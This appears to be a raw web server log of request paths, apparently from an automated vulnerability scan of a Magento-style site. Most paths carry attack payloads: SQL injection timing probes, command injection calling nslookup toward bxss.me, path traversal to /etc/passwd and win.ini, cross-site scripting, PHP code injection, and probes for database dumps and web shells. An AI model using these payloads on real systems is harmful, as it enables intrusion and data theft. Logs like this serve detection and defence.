/acc/js/mage/translate<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.js 1 -
/acc/skin/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/default/css/clears.css 1 https://104.36.149.61/
/`(nslookup%20hitoqhgrhjwrl1caf6.bxss.me||perl%20-e%20\"gethostbyname('hitoqhgrhjwrl1caf6.bxss.me')\")`/skin/install/default/default/css/reset.css 1 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/cgi-bin/FormHandler.cgi 1 ()%20{%20Referer
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/@@von4q/js/varien/form.js 1 https://104.36.149.61/
/nkWznCYT'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/form.js 1 https://104.36.149.61/
/&(nslookup%20hitcvjhagugkrc3805.bxss.me||perl%20-e%20\"gethostbyname('hitcvjhagugkrc3805.bxss.me')\")&'\\\"`0&(nslookup%20hitcvjhagugkrc3805.bxss.me||perl%20-e%20\"gethostbyname('hitcvjhagugkrc3805.bxss.me')\")&`'/js/prototype/windows/themes/ 1 -
/dbdump.tar 1 -
/'.gethostbyname(lc('hitte'.'uhnlszxs2b625.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(67).chr(119).chr(78).'/js/mage/adminhtml/accordion.js 1 -
/bxss.me%2ft%2fxss.html%3f%2500/index.php/install/wizard/config/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/-1%20OR%203+984-984-1=0+0+0+1/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/0O2AIAD9')%20OR%20489=(SELECT%20489%20FROM%20PG_SLEEP(15))--/js/mage/translate.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>Rirk(9998)<%2fScRiPt>/varien/js.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/varien/js.js 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/index.php/install/wizard/locale/..%2fpackage-lock.json 1 -
/MjqNZAvI'))%20OR%20753=(SELECT%20753%20FROM%20PG_SLEEP(15))--/js/prototype/prototype.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitxg\".\"esxyqovma7f4d.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(111).chr(68).chr(101).chr(77).\"/js/prototype/extended_debug.js 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/@@krkU3/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/sites/all/libraries/fckeditor 2 -
/acc/..%2fjs/varien/js.js 1 https://104.36.149.61/
//settings.inc.php 1 -
/1'\"/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2fGemfile 1 -
/$(nslookup%20hitbgkrxwzignadf33.bxss.me||perl%20-e%20\"gethostbyname('hitbgkrxwzignadf33.bxss.me')\")/js/varien/js.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/windows/themes/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/frontend/ 1 -
/horde/util/barcode.php 1 -
/${@print(md5(31337))}/js/mage/adminhtml/accordion.js 1 -
/(nslookup%20hitdovehsrhjw1bfe6.bxss.me||perl%20-e%20\"gethostbyname('hitdovehsrhjw1bfe6.bxss.me')\")/js/mage/adminhtml/wysiwyg/ 1 -
/'\"/js/prototype/tooltip_manager.js 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/scriptaculous/effects.js 1 https://104.36.149.61/
/|(nslookup%20hityyjdnsabne95713.bxss.me||perl%20-e%20\"gethostbyname('hityyjdnsabne95713.bxss.me')\")/js/mage/adminhtml/events.js 1 -
/acc/index.php/install/wizard/beginPost//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/acc/index.php/install//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc9011495/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/browser.js 1 -
/%2fxfs.bxss.me/skin/adminhtml/default/ 1 -
/@@rC2T7/js/mage/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"nhQf\"=\"nhQf/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
//skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/events.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/ 1 https://104.36.149.61/
/&(nslookup%20hitmeopjdqeno09632.bxss.me||perl%20-e%20\"gethostbyname('hitmeopjdqeno09632.bxss.me')\")&'\\\"`0&(nslookup%20hitmeopjdqeno09632.bxss.me||perl%20-e%20\"gethostbyname('hitmeopjdqeno09632.bxss.me')\")&`'/js/prototype/tooltip.js 1 -
/1'\"/skin/install/default/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitxbciumlumkb1837.bxss.me||perl%20-e%20\"gethostbyname('hitxbciumlumkb1837.bxss.me')\")|(nslookup%20hitxbciumlumkb1837.bxss.me||perl%20-e%20\"gethostbyname('hitxbciumlumkb1837.bxss.me')\")&(nslookup%20hitxbciumlumkb1837.bxss.me||perl%2 1 -
/1'\"/js/prototype/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/tooltip_manager.js 1 -
//js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>bt2L(9918)<%2fScRiPt>/hash.js 1 https://104.36.149.61/
/\"+response.write(9416362*9936609)+\"/js/mage/adminhtml/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>bt2L(9114)<%2fScRiPt>/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>mwZT(9623)<%2fScRiPt>/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/uploader/ 1 -
/iw1zgmJ5'))%20OR%20959=(SELECT%20959%20FROM%20PG_SLEEP(15))--/js/prototype/windows/ 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc9422880/js/prototype/windows/themes/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>yxiC(9179)<%2fScRiPt>/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2fweb.config 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/events.js 1 -
/acc/js/prototype/'\"()&%25<acx><ScRiPt%20>sjVf(9259)<%2fScRiPt>/themes/ 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/giftoptions/ 1 -
/Dockerfile 1 -
/|echo%20rfwvmc$()\\%20bzquqm\\nz^xyu||a%20%23'%20|echo%20rfwvmc$()\\%20bzquqm\\nz^xyu||a%20%23|\"%20|echo%20rfwvmc$()\\%20bzquqm\\nz^xyu||a%20%23/js/mage/adminhtml/events.js 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>gJZT(9516)<%2fScRiPt>/product/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>KwaQ(9112)<%2fScRiPt>/debug.js 1 https://104.36.149.61/
/acc/index.php///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/acc/.%2fjs/prototype/tooltip.js 1 https://104.36.149.61/
/acc/..%2fskin/install/default/default/css/reset.css 1 https://104.36.149.61/
//.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\etc/passwd 1 -
/%2fxfs.bxss.me/js/prototype/tooltip.js 1 -
/|(nslookup%20hitgxtymmyccy05d91.bxss.me||perl%20-e%20\"gethostbyname('hitgxtymmyccy05d91.bxss.me')\")/js/mage/adminhtml/flexuploader.js 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/browser.js 1 -
/acc/js/..%2fmage/adminhtml/accordion.js 1 https://104.36.149.61/
/cgi-bin/composer.lock 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>ja2b(9553)<%2fScRiPt>/tooltip_manager.js 1 https://104.36.149.61/
/spog/welcome 2 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/ 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/install/default/default/css/clears.css 1 -
/scripts/tiny_mce 1 -
/acc/js/%3b(nslookup%20hitdmjshdzeozb2323.bxss.me||perl%20-e%20\"gethostbyname('hitdmjshdzeozb2323.bxss.me')\")|(nslookup%20hitdmjshdzeozb2323.bxss.me||perl%20-e%20\"gethostbyname('hitdmjshdzeozb2323.bxss.me')\")&(nslookup%20hitdmjshdzeozb2323.bxss.me||per 1 -
/acc/js/mage/..%2fadminhtml/wysiwyg/ 1 https://104.36.149.61/
/NjqWe1dc'%20OR%20232=(SELECT%20232%20FROM%20PG_SLEEP(15))--/js/prototype/prototype.js 1 https://104.36.149.61/
/wp-cli.yml 1 -
/acc/js/mage/%2fxfs.bxss.me/browser.js 1 -
/!(()&&!|*|*|/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/|echo%20gqmsjj$()\\%20lopmyn\\nz^xyu||a%20%23'%20|echo%20gqmsjj$()\\%20lopmyn\\nz^xyu||a%20%23|\"%20|echo%20gqmsjj$()\\%20lopmyn\\nz^xyu||a%20%23/skin/install/default/ 1 -
/acc/skin/adminhtml/default/./WEB-INF/web.xml%00.jsp 2 -
/%3b(nslookup%20hitrkcsufwnond2724.bxss.me||perl%20-e%20\"gethostbyname('hitrkcsufwnond2724.bxss.me')\")|(nslookup%20hitrkcsufwnond2724.bxss.me||perl%20-e%20\"gethostbyname('hitrkcsufwnond2724.bxss.me')\")&(nslookup%20hitrkcsufwnond2724.bxss.me||perl%20-e% 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/events.js 1 -
/resolve 4 -
/acc/index.php/../../../package.json 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/cgi-bin/php4-cgi 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>JVyg(9098)<%2fScRiPt>/backup.js 1 https://104.36.149.61/
/!(()&&!|*|*|/index.php/install/ 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/default/css/ie7minus.css 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/giftmessage.js 1 -
/adminer-4.5.0-mysql-en.php 1 https://104.36.149.61/
/|(nslookup%20hitqhalwabfbt27cdf.bxss.me||perl%20-e%20\"gethostbyname('hitqhalwabfbt27cdf.bxss.me')\")/skin/install/default/default/css/ie7minus.css 1 -
/db.7z 1 -
/!(()&&!|*|*|/skin/install/default/ 1 https://104.36.149.61/
/v0edJBEv'))%20OR%20518=(SELECT%20518%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/skin/adminhtml/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/validation.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/prototype/prototype.js 1 -
/acc/index.php/install/wizard/../../../../../package.json 1 -
/acc/js/.%2fmage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>Ijhk(9572)<%2fScRiPt>/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2fpackage.json 1 -
/acc/skin/install/..%2fdefault/default/css/boxes.css 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>TmT7(9559)<%2fScRiPt>/js/varien/form.js 1 https://104.36.149.61/
/response.write(9279074*9175149)/js/mage/adminhtml/giftoptions/ 1 -
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/backup.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>ll2Q(9364)<%2fScRiPt>/js/prototype/prototype.js 1 https://104.36.149.61/
/js/tiny_mce 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/windows/ 1 https://104.36.149.61/
/acc/skin/install/%3b(nslookup%20hitbpdbpzjmmtd47a5.bxss.me||perl%20-e%20\"gethostbyname('hitbpdbpzjmmtd47a5.bxss.me')\")|(nslookup%20hitbpdbpzjmmtd47a5.bxss.me||perl%20-e%20\"gethostbyname('hitbpdbpzjmmtd47a5.bxss.me')\")&(nslookup%20hitbpdbpzjmmtd47a5.bx 1 -
/bxss.me/js/scriptaculous/effects.js 1 https://104.36.149.61/
/<!--/js/prototype/windows/ 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>Ijhk(9589)<%2fScRiPt>/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/form.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/hash.js 1 -
/.%2facc/js/prototype/windows/themes/ 1 https://104.36.149.61/
/adminer-4.6.1-en.php 1 https://104.36.149.61/
/response.write(9579160*9940985)/skin/install/default/ 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/hash.js 1 -
//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3 -
/acc'%20AND%202*3*8=6*8%20AND%20'xkTh'='xkTh/skin/frontend/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/prototype/debug.js 1 https://104.36.149.61/
/portal/info.jsp 12 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/hash.js 1 -
/(nslookup%20hitrnicvcrpstcaa21.bxss.me||perl%20-e%20\"gethostbyname('hitrnicvcrpstcaa21.bxss.me')\")/index.php/install/wizard/locale/ 1 -
/adminer-4.3.0-mysql.php 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/validation.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../etc/passwd%00en 1 -
/'.gethostbyname(lc('hitev'.'qhvyrwtxa89d2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(87).chr(104).chr(90).'/js/mage/adminhtml/form.js 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/uploader/ 1 -
/acc/js/mage/adminhtml/wysiwyg/./WEB-INF/web.xml%00.jsp 2 -
/acc/js/mage/adminhtml/product/./WEB-INF/web.xml%00.jsp 2 -
/acc9623359/js/varien/form.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/index.php/install/wizard/config/ 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/class/phpthumb/phpThumb.php 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/..%2fjs/mage/translate.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/index.php/install/wizard/config/ 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/Http://bxss.me/t/fit.txt/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/wizard/locale/ 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/wysiwyg/ 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/debug.js 1 https://104.36.149.61/
/acc/skin/adminhtml/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/\"+response.write(9901155*9552789)+\"/js/prototype/tooltip.js 1 -
/$(nslookup%20hitphgvskcrpu9e71c.bxss.me||perl%20-e%20\"gethostbyname('hitphgvskcrpu9e71c.bxss.me')\")/js/mage/adminhtml/giftmessage.js 1 -
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd%00 1 -
/acc/skin/install/default/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/reset.css 1 -
/SGFzGCoO')%20OR%20484=(SELECT%20484%20FROM%20PG_SLEEP(15))--/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/ 1 -
/`(nslookup%20hitohrsvxqvaz7beb6.bxss.me||perl%20-e%20\"gethostbyname('hitohrsvxqvaz7beb6.bxss.me')\")`/js/mage/adminhtml/sales/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/css/ie7minus.css 1 -
/acc/..%2fskin/frontend/ 1 https://104.36.149.61/
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/giftoptions/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>JGJG(9272)<%2fScRiPt>/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/effects.js 1 https://104.36.149.61/
/|(nslookup%20hitgahbfkwurbd980d.bxss.me||perl%20-e%20\"gethostbyname('hitgahbfkwurbd980d.bxss.me')\")/js/prototype/windows/themes/ 1 -
//js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/js.js 1 -
/wp-content/plugins/woopra/inc/php-ofc-library/php-ofc-library/ofc_upload_image.php 1 -
/acc/js/%3b(nslookup%20hitnraxxccxkjf72d7.bxss.me||perl%20-e%20\"gethostbyname('hitnraxxccxkjf72d7.bxss.me')\")|(nslookup%20hitnraxxccxkjf72d7.bxss.me||perl%20-e%20\"gethostbyname('hitnraxxccxkjf72d7.bxss.me')\")&(nslookup%20hitnraxxccxkjf72d7.bxss.me||per 1 -
/db.sql.tar 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/mifs/. 26 https://104.36.149.61:443
/acc/'\"()&%25<acx><ScRiPt%20>ja2b(9196)<%2fScRiPt>/prototype/tooltip_manager.js 1 https://104.36.149.61/
/@@Se1Fk/js/prototype/validation.js 1 https://104.36.149.61/
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(111).concat(78).concat(122).concat(85)+(require'socket'%0aSocket.gethostbyname('hitdw'+'lrgapuat0f706.bxss.me.')[3].to_s)+'/js/mage/adminhtml/ 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/mysql/ 1 -
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/frontend/ 1 -
//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/ 1 https://104.36.149.61/
/gulpfile.js 1 -
/acc/index.php/install//../../../../../../../../etc/passwd%00.jsp 1 -
/\".gethostbyname(lc(\"hitxi\".\"jkhunxoa36e10.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(117).chr(81).chr(116).chr(81).\"/skin/adminhtml/default/ 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/../../../../package.json 1 -
/apfUyIds')%20OR%20645=(SELECT%20645%20FROM%20PG_SLEEP(15))--/js/mage/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/index.php/install/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/ 1 https://104.36.149.61/
/WEB-INF/jboss-web.xml%20-%20Copy 1 -
/$(nslookup%20hitxbgdkesetw8113a.bxss.me||perl%20-e%20\"gethostbyname('hitxbgdkesetw8113a.bxss.me')\")/js/prototype/tooltip_manager.js 1 -
/FCKeditor 2 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/giftmessage.js 1 -
/dJpHAQbW'%20OR%2014=(SELECT%2014%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/extended_debug.js 1 https://104.36.149.61/
/manager/status/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/prototype.js 1 -
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/css/boxes.css 1 -
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/ 1 https://104.36.149.61/
/${10000133+9999849}/skin/install/default/default/css/boxes.css 1 -
/response.write(9129642*9897132)/index.php/install/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(119).concat(69).concat(116).concat(85)+(require\"socket\"%0aSocket.gethostbyname(\"hitfu\"+\"amohcicb5d368.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/image.js 1 -
/'.print(md5(31337)).'/js/prototype/windows/themes/ 1 -
/!(()&&!|*|*|/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php//........................................................................../../../../../../../../windows/win.ini 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(74).concat(99).concat(73)+(require\"socket\"%0aSocket.gethostbyname(\"hittz\"+\"nodxqrgq8d277.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/giftmessage.js 1 -
/authenticationendpoint/test.jsp 1 -
/104-backup.tgz 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/varien/form.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/ 1 -
/&echo%20scdpna$()\\%20dgxnxs\\nz^xyu||a%20%23'%20&echo%20scdpna$()\\%20dgxnxs\\nz^xyu||a%20%23|\"%20&echo%20scdpna$()\\%20dgxnxs\\nz^xyu||a%20%23/js/prototype/debug.js 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/form.js 1 -
/acc/skin/install/%3b(nslookup%20hitncusbnumth6d68a.bxss.me||perl%20-e%20\"gethostbyname('hitncusbnumth6d68a.bxss.me')\")|(nslookup%20hitncusbnumth6d68a.bxss.me||perl%20-e%20\"gethostbyname('hitncusbnumth6d68a.bxss.me')\")&(nslookup%20hitncusbnumth6d68a.bx 1 -
/&(nslookup%20hitqtvyorqhee13928.bxss.me||perl%20-e%20\"gethostbyname('hitqtvyorqhee13928.bxss.me')\")&'\\\"`0&(nslookup%20hitqtvyorqhee13928.bxss.me||perl%20-e%20\"gethostbyname('hitqtvyorqhee13928.bxss.me')\")&`'/js/mage/adminhtml/product/ 1 -
/r57.php 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/css/boxes.css 1 -
/Http://bxss.me/t/fit.txt/js/prototype/extended_debug.js 1 https://104.36.149.61/
/${10000213+9999709}/skin/adminhtml/default/ 1 -
/echo%20bnasmn$()\\%20jponwe\\nz^xyu||a%20%23'%20&echo%20bnasmn$()\\%20jponwe\\nz^xyu||a%20%23|\"%20&echo%20bnasmn$()\\%20jponwe\\nz^xyu||a%20%23/js/varien/form.js 1 -
/acc/skin/..%2finstall/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/hash.js 1 https://104.36.149.61/
//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini 1 -
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/css/boxes.css 1 -
/'.print(md5(31337)).'/js/prototype/validation.js 1 -
/v2/docs 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/index.php/install/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitct'.'nvircugo6f840.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(78).chr(101).chr(90).'/skin/install/default/ 1 -
//js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/-1%20OR%203+303-303-1=0+0+0+1/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>q8Xa(9097)<%2fScRiPt>/adminhtml/browser.js 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(105).concat(86).concat(104).concat(88)+(require\"socket\"%0aSocket.gethostbyname(\"hitdx\"+\"afzupull88e16.bxss.me.\")[3].to_s)+\"/js/varien/js.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>IUUR(9151)<%2fScRiPt>/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
